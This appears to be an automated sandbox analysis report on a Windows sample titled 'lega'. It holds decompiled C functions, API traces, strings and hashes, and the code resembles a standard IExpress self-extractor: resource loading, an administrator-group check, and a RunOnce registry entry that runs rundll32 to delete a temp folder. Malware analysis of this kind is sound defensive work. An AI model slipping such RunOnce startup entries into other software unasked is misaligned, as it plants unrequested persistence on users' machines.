MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 002F45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 002F45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 002F460D
MessageBeep.USER32(00000000), ref: 002F4630
MessageBoxA.USER32(?,00000000,lega,00000000), ref: 002F4666
LocalFree.KERNEL32(00000000), ref: 002F466F

Part of subcall function 002F681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 002F686E
Part of subcall function 002F681F: GetSystemMetrics.USER32(0000004A), ref: 002F68A7
Part of subcall function 002F681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002F68CC
Part of subcall function 002F681F: RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,?,0000000C), ref: 002F68F4
Part of subcall function 002F681F: RegCloseKey.ADVAPI32(?), ref: 002F6902

Strings

LoadString() Error. Could not load string resource., xrefs: 002F44E4
lega, xrefs: 002F4545, 002F465A

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lega
API String ID: 3244514340-2134167237
Opcode ID: 2e7c58bf92c6456b4a31edd5a78f29e2c2f4401c26419b2bb129064b9a9f786c
Instruction ID: 33eba325abeabd438da19b1d876d1a642b9370c8c2c918a0366fc5f512dd9083
Opcode Fuzzy Hash: 2e7c58bf92c6456b4a31edd5a78f29e2c2f4401c26419b2bb129064b9a9f786c
Instruction Fuzzy Hash: F451D37191011E9BDB21AF289C48BBBFB69EF45390F0441B4FE09A7241DBB19E65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 002F2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E002F2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x2f8004; // 0x404cc811
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E002F1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E002F658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E002F658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x2f1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E002F1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E002F6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x002f2773
0x002f277e
0x002f2785
0x002f278a
0x002f278d
0x002f2790
0x002f2792
0x002f2798
0x002f279d
0x002f28b2
0x00000000
0x002f27a3
0x002f27a3
0x002f27af
0x002f27c2
0x002f27c8
0x002f27cd
0x002f27d5
0x002f28b7
0x002f28b9
0x00000000
0x002f27db
0x002f27dd
0x002f28aa
0x00000000
0x002f27e3
0x002f27e3
0x002f27ec
0x002f27f8
0x002f2803
0x002f280b
0x002f2831
0x002f28c3
0x002f28c9
0x002f28cd
0x002f2837
0x002f285a
0x002f285c
0x002f2865
0x002f2892
0x002f2895
0x00000000
0x00000000
0x002f2867
0x002f2878
0x002f288c
0x00000000
0x002f287a
0x002f2880
0x002f2885
0x002f2897
0x002f2899
0x002f2899
0x002f2878
0x002f2865
0x002f28a0
0x002f28bf
0x002f28c1
0x00000000
0x00000000
0x002f28c1
0x002f2831
0x002f27dd
0x002f27d5
0x002f28e5

APIs

CharUpperA.USER32(404CC811,00000000,00000000,00000000), ref: 002F27A8
CharNextA.USER32(0000054D), ref: 002F27B5
CharNextA.USER32(00000000), ref: 002F27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2829
RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 002F28AA
GetSystemDirectoryA.KERNEL32 ref: 002F28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 002F27E4

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 4abd23b5d69da55bec7afb70cf4452542bc4eef69056d52b0969f9cc0db464a2
Instruction ID: 956c77a7611c69503f4d9d1095ae00d96d657b83875648e17f7fcc82a87fe7b0
Opcode Fuzzy Hash: 4abd23b5d69da55bec7afb70cf4452542bc4eef69056d52b0969f9cc0db464a2
Instruction Fuzzy Hash: 514196B191011CABDB249F64AC89EFAB7BDEB167D0F0040B9E649E2110DB704E95CF61

Uniqueness

Uniqueness Score: -1.00%

Function 002F2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E002F2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x2f8004; // 0x404cc811
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x2f8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E002F658A( &_v268, 0x104, 0x2f1140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
							E002F171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E002F6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x002f2272
0x002f2277
0x002f2279
0x002f2283
0x002f2289
0x002f22ab
0x002f22b1
0x002f22c4
0x002f22e0
0x002f22e6
0x002f22f5
0x002f230d
0x002f231c
0x002f231c
0x002f2321
0x002f233a
0x002f2342
0x002f2348
0x002f234b
0x002f234c
0x002f234c
0x002f234e
0x002f234f
0x002f236e
0x002f236e
0x002f237a
0x002f2380
0x002f2380
0x002f2381
0x002f2381
0x002f238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 002F22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 002F22D8
memset.MSVCRT ref: 002F22F5
GetSystemDirectoryA.KERNEL32 ref: 002F2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 002F236E
RegCloseKey.ADVAPI32(?), ref: 002F237A

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 002F232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 002F2299
wextract_cleanup3, xrefs: 002F227C, 002F22CD, 002F2363
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 002F2321

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
API String ID: 3027380567-1455616767
Opcode ID: bd2fe27d6ee805d7558e9c864d192842cb449bcc3a4083b1f3c75458eba2ebc7
Instruction ID: 320715af129f9fdb2b5a6464f568b10b1f32bbfa362b4d26634488422acbd589
Opcode Fuzzy Hash: bd2fe27d6ee805d7558e9c864d192842cb449bcc3a4083b1f3c75458eba2ebc7
Instruction Fuzzy Hash: 2231B671A1021CABDB219B50EC49FFAF77CEB55790F4001F9B60DA6050DE716B98CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002F3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E002F3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x2f8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x2f8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E002F43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x2f8d4c);
					SetWindowTextA(_t33, "lega");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x2f88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E002F30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x002f3108
0x002f310b
0x002f31b7
0x002f31ca
0x002f31d0
0x002f31d0
0x002f31da
0x00000000
0x002f31da
0x002f3111
0x002f3114
0x002f3136
0x002f3136
0x002f3138
0x002f313b
0x002f3141
0x00000000
0x002f3143
0x002f3116
0x002f311b
0x002f314b
0x002f3151
0x002f3158
0x002f316a
0x002f3176
0x002f317d
0x002f318b
0x002f319e
0x002f31a3
0x00000000
0x002f31ad
0x002f3120
0x00000000
0x00000000
0x002f312a
0x002f3134
0x00000000
0x00000000
0x00000000
0x002f3134
0x002f312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 002F313B
GetDesktopWindow.USER32 ref: 002F314B
SetDlgItemTextA.USER32(?,00000834), ref: 002F316A
SetWindowTextA.USER32(?,lega), ref: 002F3176
SetForegroundWindow.USER32(?), ref: 002F317D
GetDlgItem.USER32(?,00000834), ref: 002F3185
GetWindowLongA.USER32(00000000,000000FC), ref: 002F3190
SetWindowLongA.USER32(00000000,000000FC,002F30C0), ref: 002F31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 002F31CA

Strings

lega, xrefs: 002F3170

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lega
API String ID: 3785188418-245445314
Opcode ID: 3295aff41e35f9969c762b4b88edc0b6fbf37dfdd2455a04a52b59a23f807284
Instruction ID: 25ad47d7bebc89d54c275a8e45abb64448a51e4c695baf912cfe576f33a97174
Opcode Fuzzy Hash: 3295aff41e35f9969c762b4b88edc0b6fbf37dfdd2455a04a52b59a23f807284
Instruction Fuzzy Hash: 0011E47122421ABBDB109F24FC0CBBB7A64EB467F0F100230FA1E911E0DBB09661C742

Uniqueness

Uniqueness Score: -1.00%

Function 002F18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E002F18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x2f8004; // 0x404cc811
				_v8 = _t23 ^ _t53;
				_t25 =  *0x2f8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E002F6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E002F17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x2f8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x2f8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x002f18a3
0x002f18a3
0x002f18ab
0x002f18b2
0x002f18b5
0x002f18be
0x002f18c0
0x002f18c6
0x002f18c7
0x002f18ca
0x002f18cf
0x002f19c9
0x002f19d8
0x002f19d8
0x002f18df
0x002f19b8
0x002f19bd
0x002f19bf
0x002f19bf
0x00000000
0x002f19bd
0x002f18fa
0x00000000
0x00000000
0x002f1912
0x002f19aa
0x002f19ad
0x002f19b3
0x00000000
0x002f1927
0x002f1927
0x002f1932
0x002f1936
0x002f19a9
0x002f19a9
0x00000000
0x002f19a9
0x002f194c
0x002f19a2
0x002f19a3
0x00000000
0x002f196e
0x002f1970
0x002f1999
0x002f199c
0x00000000
0x002f199c
0x002f1972
0x002f1972
0x002f1975
0x002f1984
0x002f1985
0x002f198a
0x00000000
0x00000000
0x00000000
0x002f198c
0x002f1991
0x002f1996
0x00000000
0x002f1996
0x002f194c

APIs

Part of subcall function 002F17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002F18DD), ref: 002F181A
Part of subcall function 002F17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 002F182C
Part of subcall function 002F17EE: AllocateAndInitializeSid.ADVAPI32(002F18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002F18DD), ref: 002F1855
Part of subcall function 002F17EE: FreeSid.ADVAPI32(?,?,?,?,002F18DD), ref: 002F1883
Part of subcall function 002F17EE: FreeLibrary.KERNEL32(00000000,?,?,?,002F18DD), ref: 002F188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 002F18EB
OpenProcessToken.ADVAPI32(00000000), ref: 002F18F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 002F190A
GetLastError.KERNEL32 ref: 002F1918
LocalAlloc.KERNEL32(00000000,?,?), ref: 002F192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 002F1944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002F1964
EqualSid.ADVAPI32(00000004,?), ref: 002F197A
FreeSid.ADVAPI32(?), ref: 002F199C
LocalFree.KERNEL32(00000000), ref: 002F19A3
CloseHandle.KERNEL32(?), ref: 002F19AD

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: dd8e1acf3773dc844d3b6bf0c66c8f6d8fd4f26cd23fc1af922b93694e9dcf69
Instruction ID: 67033d1ac67db5205a7742d6a2e72e41c10db99efdb168663f8ed33c0115e379
Opcode Fuzzy Hash: dd8e1acf3773dc844d3b6bf0c66c8f6d8fd4f26cd23fc1af922b93694e9dcf69
Instruction Fuzzy Hash: 75311B71A1020AEFDB109FA5EC58ABFBBB8FF04790B504439E649D2150DB709925DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 002F468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E002F468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x002f4699
0x002f469b
0x002f46a9
0x002f46af
0x002f46b4
0x002f46bc
0x002f46f9
0x00000000
0x002f46f9
0x002f46d9
0x002f46dd
0x00000000
0x00000000
0x002f46e5
0x002f46ef
0x00000000
0x002f46f5
0x002f46ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46A0
SizeofResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002F46C3
LoadResource.KERNEL32(00000000,00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46CC
LockResource.KERNEL32(00000000,?,002F2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46D3
memcpy_s.MSVCRT ref: 002F46E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002F46EF

Strings

TITLE, xrefs: 002F469D, 002F46C0
lega, xrefs: 002F46E4

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$lega
API String ID: 3370778649-934471404
Opcode ID: 0c41a8444e2a82701f712d7aa0a460ecdf8a3d625c05242d0c58b642919179e6
Instruction ID: 33098e0d860654e48e12f521f5244209c6459a04499ec665cce9a932fb925ddf
Opcode Fuzzy Hash: 0c41a8444e2a82701f712d7aa0a460ecdf8a3d625c05242d0c58b642919179e6
Instruction Fuzzy Hash: 9B01A2722402057BE3102BA57C4CF3B7E2CDB8ABF1F040134FB4DC6140D9A19850C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 002F681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E002F681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x2f8004; // 0x404cc811
				_v8 = _t19 ^ _t44;
				_t41 =  *0x2f81d8; // 0xfffffffe
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x2f81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x2f81d8; // 0xfffffffe
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x2f1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E002F66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x2f81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x2f463b
				return E002F6CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x002f681f
0x002f682a
0x002f6831
0x002f6836
0x002f683c
0x002f683e
0x002f6848
0x002f6851
0x002f685d
0x002f6864
0x002f6876
0x002f693a
0x002f693a
0x002f687c
0x002f687e
0x002f6885
0x00000000
0x002f68d6
0x002f68f4
0x002f6900
0x002f6902
0x002f690a
0x00000000
0x002f690c
0x002f690c
0x002f691c
0x00000000
0x002f691e
0x002f6924
0x002f692b
0x002f6932
0x00000000
0x00000000
0x00000000
0x002f692b
0x002f691c
0x002f690a
0x002f6885
0x002f6876
0x002f6940
0x002f6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 002F686E
GetSystemMetrics.USER32(0000004A), ref: 002F68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002F68CC
RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,?,0000000C), ref: 002F68F4
RegCloseKey.ADVAPI32(?), ref: 002F6902

Part of subcall function 002F66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,002F691A), ref: 002F6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 002F68C2
;F/, xrefs: 002F6940

Memory Dump Source

Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F/$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1584524354
Opcode ID: 97dc58a369f0656e276f712f599a4850248c9c7bf2919b2b442b52fcdb2ee543
Instruction ID: 75dce2d3f564ddadea8dee4f69f8767f495107f3b1b6d0b2a5a9f53ce218edbb
Opcode Fuzzy Hash: 97dc58a369f0656e276f712f599a4850248c9c7bf2919b2b442b52fcdb2ee543
Instruction Fuzzy Hash: 9E317F71A1021D9FDB218F11EC0ABBAF7BCEB457A4F0401B9EA4DA3140DB709995CF52

Uniqueness

Uniqueness Score: -1.00%

Function 002F17EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E002F17EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x2f8004; // 0x404cc811
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
